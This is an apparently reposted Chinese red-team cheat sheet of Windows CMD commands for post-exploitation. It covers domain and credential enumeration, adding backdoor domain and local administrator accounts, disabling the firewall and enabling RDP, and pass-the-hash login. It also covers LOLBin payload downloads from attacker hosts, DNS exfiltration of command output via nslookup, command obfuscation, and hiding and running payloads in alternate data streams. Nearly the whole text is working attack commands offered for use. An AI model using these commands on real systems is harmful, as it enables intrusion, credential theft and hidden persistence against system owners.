红队的基础CMD命令
2022-12-11 01:42:18 Author: Gcow安全团队(查看原文) 阅读量:11 收藏

版本和补丁信息

  1. wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #获取架构

  2. systeminfo

  3. systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #仅获取这些信息

  4. wmic computersystem LIST full #获取电脑信息

  5. wmic qfe get Caption,Description,HotFixID,InstalledOn #补丁程序

  6. wmic qfe list brief #更新

  7. hostname

  8. DRIVERQUERY #第三方易受攻击驱动?

环境

  1. set #列出所有环境变量

需要强调的一些环境变量:

  • COMPUTERNAME: 计算机名称

  • TEMP/TMP: 临时文件夹

  • USERNAME: 用户名

  • HOMEPATH/USERPROFILE: 主目录

  • windir: C:\Windows

  • OS:Windos OS

  • LOGONSERVER: 域控制器名称

  • USERDNSDOMAIN: 与DNS一起使用的域名

  • USERDOMAIN: 域名的名称

  1. nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DC的DNS请求

挂载磁盘

  1. (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)

  2. wmic logicaldisk get caption,description,providername

回收站

  1. dir C:\$Recycle.Bin /s /b

流程、服务和软件

  1. schtasks /query /fo LIST /v #计划任务的冗余

  2. schtasks /query /fo LIST 2>nul | findstr TaskName

  3. schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM

  4. tasklist /V #进程列表

  5. tasklist /SVC #将进程链接到已启动的服务

  6. net start #Windows服务启动

  7. wmic service list brief #列出服务

  8. sc query #服务清单

  9. dir /a "C:\Program Files" #已安装的软件

  10. dir /a "C:\Program Files (x86)" #已安装的软件

  11. reg query HKEY_LOCAL_MACHINE\SOFTWARE #已安装的软件

域信息

  1. # 常见AD信息

  2. echo %USERDOMAIN% #获取域名

  3. echo %USERDNSDOMAIN% #获取域名

  4. echo %logonserver% #获取域控制器的名称

  5. set logonserver #获取域控制器的名称

  6. set log #获取域控制器的名称

  7. gpresult /V # 应用当前策略

  8. wmic ntdomain list /format:list    #显示有关域和域控制器的信息

  9. # 用户

  10. dsquery user #获取所有用户

  11. net user /domain #列出域的所有用户

  12. net user <ACCOUNT_NAME> /domain #获取关于该用户的信息

  13. net accounts /domain #密码和锁定策略

  14. wmic useraccount list /format:list #显示所有已登录设备的本地帐户和域帐户的信息

  15. wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #获取所有用户

  16. wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # 获取1个用户的信息

  17. wmic sysaccount list /format:list # 转储关于被用作服务帐户的任何系统帐户的信息。

  18. # 组信息

  19. net group /domain #域组列表

  20. net localgroup administrators /domain #列出属于域内管理员组的用户(这里包括组“domain Admins”)

  21. net group "Domain Admins" /domain #列出具有域管理权限的用户

  22. net group "domain computers" /domain #连接到域的pc列表

  23. net group "Domain Controllers" /domain #列出域控制器的PC帐号

  24. wmic group list /format:list # 所有本地组的信息

  25. wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #获取所有分组

  26. wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #组的成员

  27. wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #组的成员

  28. # 计算机

  29. dsquery computer #得到所有的电脑

  30. net view /domain #域的pc的Lis

  31. nltest /dclist:<DOMAIN> #列出域控制器

  32. wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #所有的电脑

  33. wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #所有的电脑

  34. # 信任关系

  35. nltest /domain_trust #信任关系的映射

  36. # 获取OU内的所有对象

  37. dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

日志和事件

  1. #使用另一个凭据进行安全查询

  2. wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

用户和组

用户

  1. #自己

  2. whoami /all #所有关于我的信息,看看启用的令牌

  3. whoami /priv #只显示特权

  4. # 本地用户

  5. net users #所有用户

  6. dir /b /ad "C:\Users"

  7. net user %username% #用户(我)的信息

  8. net accounts #有关密码要求的信息

  9. wmic USERACCOUNT Get Domain,Name,Sid

  10. net user /add [username] [password] #创建用户

  11. # 其他用户查找

  12. qwinsta #还有人登录吗?

  13. #启动新的cmd.exe和新的信用(模拟在网络中)

  14. runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

  15. #作为管理员使用sysinternals中的logonsessions检查当前登录会话

  16. logonsessions.exe

  17. logonsessions64.exe

  1. #本地

  2. net localgroup #所有可用的组

  3. net localgroup Administrators #组的信息(管理员)

  4. net localgroup administrators [username] /add #添加用户到管理员

  5. #域

  6. net group /domain #域组信息

  7. net group /domain <domain_group_name> #属于组的用户

列出会话

  1. qwinsta

  2. klist sessions

密码策略

  1. net accounts

凭证

  1. cmdkey /list #列出证书

  2. vaultcmd /listcreds:"Windows Credentials" /all #查看Windows凭据管理器

  3. rundll32 keymgr.dll, KRShowKeyMgr #你需要才能图形访问

与用户保持一致

  1. # 添加域用户并将其放入域管理员组中

  2. net user username password /ADD /DOMAIN

  3. net group "Domain Admins" username /ADD /DOMAIN

  4. # 添加本地用户并将其设置为本地管理员组

  5. net user username password /ADD

  6. net localgroup Administrators username /ADD

  7. # 添加用户到目标的组

  8. net localgroup "Remote Desktop Users" UserLoginName  /add

  9. net localgroup "Debugger users" UserLoginName /add

  10. net localgroup "Power users" UserLoginName /add

网络信息

接口,路由,端口,主机和DNSCache

  1. ipconfig /all #显示本机TCP/IP配置的详细信息

  2. route print #查看路由表命令

  3. arp -a #显示查看高速缓存中的所有项目

  4. netstat -ano #打开的端口信息

  5. type C:\WINDOWS\System32\drivers\etc\hosts

  6. ipconfig /displaydns | findstr "Record" | findstr "Name Host"

防火墙

  1. netsh firewall show state # 防火墙信息,开放端口

  2. netsh advfirewall firewall show rule name=all

  3. netsh firewall show config # 显示防火墙配置

  4. Netsh Advfirewall show allprofiles

  5. NetSh Advfirewall set allprofiles state off  #关闭

  6. NetSh Advfirewall set allprofiles state on  #打开

  7. netsh firewall set opmode disable #关闭

  8. #如何打开端口

  9. netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138

  10. netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139

  11. netsh firewall add portopening TCP 3389 "Remote Desktop"

  12. #启用远程桌面

  13. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

  14. netsh firewall add portopening TCP 3389 "Remote Desktop"

  15. ::netsh firewall set service remotedesktop enable #我发现这一行不需要

  16. ::sc config TermService start= auto #我发现这一行不需要

  17. ::net start Termservice #我发现这一行不需要

  18. #使用wmic开启远程桌面

  19. wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"

  20. ##或

  21. wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

  22. #启用远程协助:

  23. reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v fAllowToGetHelp /t REG_DWORD /d 1 /f

  24. netsh firewall set service remoteadmin enable

  25. #Ninja组合(新管理员用户,RDP + rassist +防火墙允许)

  26. net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

  27. ::Connect to RDP (using hash or password)

  28. xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49

  29. xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

共享

  1. net view #获得计算机的列表

  2. net view /all /domain [domainname] #域上的共享

  3. net view \\computer /ALL #列出计算机的共享

  4. net use x: \\computer\share #在本地装载共享

  5. net share #查看当前共享

Wifi

  1. netsh wlan show profile #AP SSID

  2. netsh wlan show profile <SSID> key=clear #获取明文密码

SNMP

  1. reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Network Interfaces

  1. ipconfig /all

ARP table

  1. arp -A

下载

Bitsadmin.exe

  1. bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

CertReq.exe

  1. CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe

  1. certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

Desktopimgdownldr.exe

  1. set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

  1. diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

Esentutl.exe

  1. esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand.exe

  1. expand \\webdav\folder\file.bat c:\ADS\file.bat

Extrac32.exe

  1. extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr.exe

  1. findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Ftp.exe

  1. cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

  1. C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

  1. HH.exe http://some.url/script.ps1

Ieexec.exe

  1. ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

  1. makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

MpCmdRun.exe

  1. MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

Replace.exe

  1. replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Excel.exe

  1. Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

  1. Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

  1. squirrel.exe --download [url to package]

Update.exe

  1. Update.exe --download [url to package]

Winword.exe

  1. winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

  1. wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Misc

  1. cd #列出当前目录

  2. cd C:\path\to\dir #改变目录

  3. dir #列出当前目录内容

  4. dir /a:h C:\path\to\dir #列出隐藏文件

  5. dir /s /b #没有垃圾的递归列表

  6. time #获取当前时间

  7. date #获取当前日期

  8. shutdown /r /t 0 #重启

  9. type <file> #从第一个字节开始正向打印文件内容

  10. #Runas

  11. runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #使用保存的凭据

  12. runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

  13. #Hide

  14. attrib +h file #设置隐藏

  15. attrib -h file #退出隐藏

  16. #对你拥有的文件给予完全的控制权

  17. icacls <FILE_PATH> /t /e /p <USERNAME>:F

  18. icacls <FILE_PATH> /e /r <USERNAME> #删除权限

  19. #递归复制到smb

  20. xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

  21. #Exe2bat转换bat文件中的exe文件

  22. #ADS

  23. dir /r #Detect ADS

  24. more file.txt:ads.txt #read ADS

  25. powershell (Get-Content file.txt -Stream ads.txt)

  26. # 从代码中获取错误消息

  27. net helpmsg 32 #32是这种情况下的代码

Bypass Char Blacklisting

  1. echo %HOMEPATH:~6,-11%   #\

  2. who^ami   #whoami

DOSfuscation

生成混淆的CMD命令行

  1. git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git

  2. cd Invoke-DOSfuscation

  3. Import-Module .\Invoke-DOSfuscation.psd1

  4. Invoke-DOSfuscation

  5. help

  6. SET COMMAND type C:\Users\Administrator\Desktop\flag.txt

  7. encoding

Listen address ACLs

您可以在[http://+:80/Temporary_listen_Addresses/]上侦听,而无需管理员身份。

  1. netsh http show urlacl

Manual DNS shell

Attacker (Kali) 必须使用以下两个选项之一:

  1. sudo responder -I <iface> #Active

  2. sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

Victim

对于/f标记_**\technique:这允许我们执行命令,获取每行的前X个单词,并通过DNS将其发送到服务器

  1. for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami

  2. for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2

  3. for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder

  4. for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder

  5. for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one

  6. #More complex commands

  7. for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one

您还可以重定向输出,然后读取输出。

  1. whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt

  2. for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>

从C代码调用CMD

  1. #include <stdlib.h>     /* system, NULL, EXIT_FAILURE */

  2. // When executed by Administrator this program will create a user and then add him to the administrators group

  3. // i686-w64-mingw32-gcc addmin.c -o addmin.exe

  4. // upx -9 addmin.exe

  5. int main (){

  6.    int i;

  7.    i=system("net users otherAcc 0TherAcc! /add");

  8.    i=system("net localgroup administrators otherAcc /add");

  9.    return 0;

  10. }

备用数据流CheatSheet(ADS/备用数据流)

Taken from https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

  1. ##Add content to ADS###

  2. type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

  3. extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

  4. findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

  5. certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

  6. makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

  7. print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe

  8. reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg

  9. regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey

  10. expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat

  11. esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o

  12. powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"

  13. curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe

  14. cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat

  15. set-content - path {path to the file} - stream {name of the stream}

  16. ## Discover ADS contecnt

  17. dir /R

  18. streams.exe <c:\path\to\file> #Binary from sysinternals#

  19. Get-Item -Path .\fie.txt -Stream *

  20. gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'

  21. ##Extract content from ADS###

  22. expand c:\ads\file.txt:test.exe c:\temp\evil.exe

  23. esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o

  24. more < c:\ads\file.txt:test.exe

  25. ##Executing the ADS content###

  26. * WMIC

  27. wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

  28. * Rundll32

  29. rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain

  30. rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll

  31. rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll

  32. * Cscript

  33. cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"

  34. * Wscript

  35. wscript c:\ads\file.txt:script.vbs

  36. echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js

  37. * Forfiles

  38. forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"

  39. * Mavinject.exe

  40. c:\windows\SysWOW64\notepad.exe

  41. tasklist | findstr notepad

  42. notepad.exe                   4172 31C5CE94259D4006           2     18,476 K

  43. type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"

  44. c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"

  45. * MSHTA

  46. mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"

  47. (Does not work on Windows 10 1903 and newer)

  48. * Control.exe

  49. control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll

  50. https://twitter.com/bohops/status/954466315913310209

  51. * Create service and run

  52. sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto

  53. sc start evilservice

  54. https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

  55. * Powershell.exe

  56. powershell -ep bypass - < c:\temp:ttt

  57. * Powershell.exe

  58. powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"

  59. * Powershell.exe

  60. Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}

  61. * Regedit.exe

  62. regedit c:\ads\file.txt:regfile.reg

  63. * Bitsadmin.exe

  64. bitsadmin /create myfile

  65. bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe

  66. bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL

  67. bitsadmin /RESUME myfile

  68. * AppVLP.exe

  69. AppVLP.exe c:\windows\tracing\test.txt:ha.exe

  70. * Cmd.exe

  71. cmd.exe - < fakefile.doc:reg32.bat

  72. https://twitter.com/yeyint_mth/status/1143824979139579904

  73. * Ftp.exe

  74. ftp -s:fakefile.txt:aaaa.txt

  75. https://github.com/sailay1996/misc-bin/blob/master/ads.md

  76. * ieframe.dll , shdocvw.dll (ads)

  77. echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt

  78. rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt

  79. https://github.com/sailay1996/misc-bin/blob/master/ads.md

  80. * bash.exe

  81. echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh

  82. bash.exe -c $(fakefile.txt:payload.sh)

  83. https://github.com/sailay1996/misc-bin/blob/master/ads.md

  84. * Regsvr32

  85. type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS

  86. regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS

推荐一个靶场,靶场地址:https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU 从web到内网再到域的靶场环境都全,且出题的思路很好,感兴趣的可以去玩玩


文章来源: http://mp.weixin.qq.com/s?__biz=MzUyNzk2NDcwMw==&mid=2247488101&idx=4&sn=115fc27bb81740323f239c75e9c5d23d&chksm=fa76dd15cd015403a4a794f068b1dd372a6612d93d1892a2ab4654074cb669265941c0385389#rd
如有侵权请联系:admin#unsafe.sh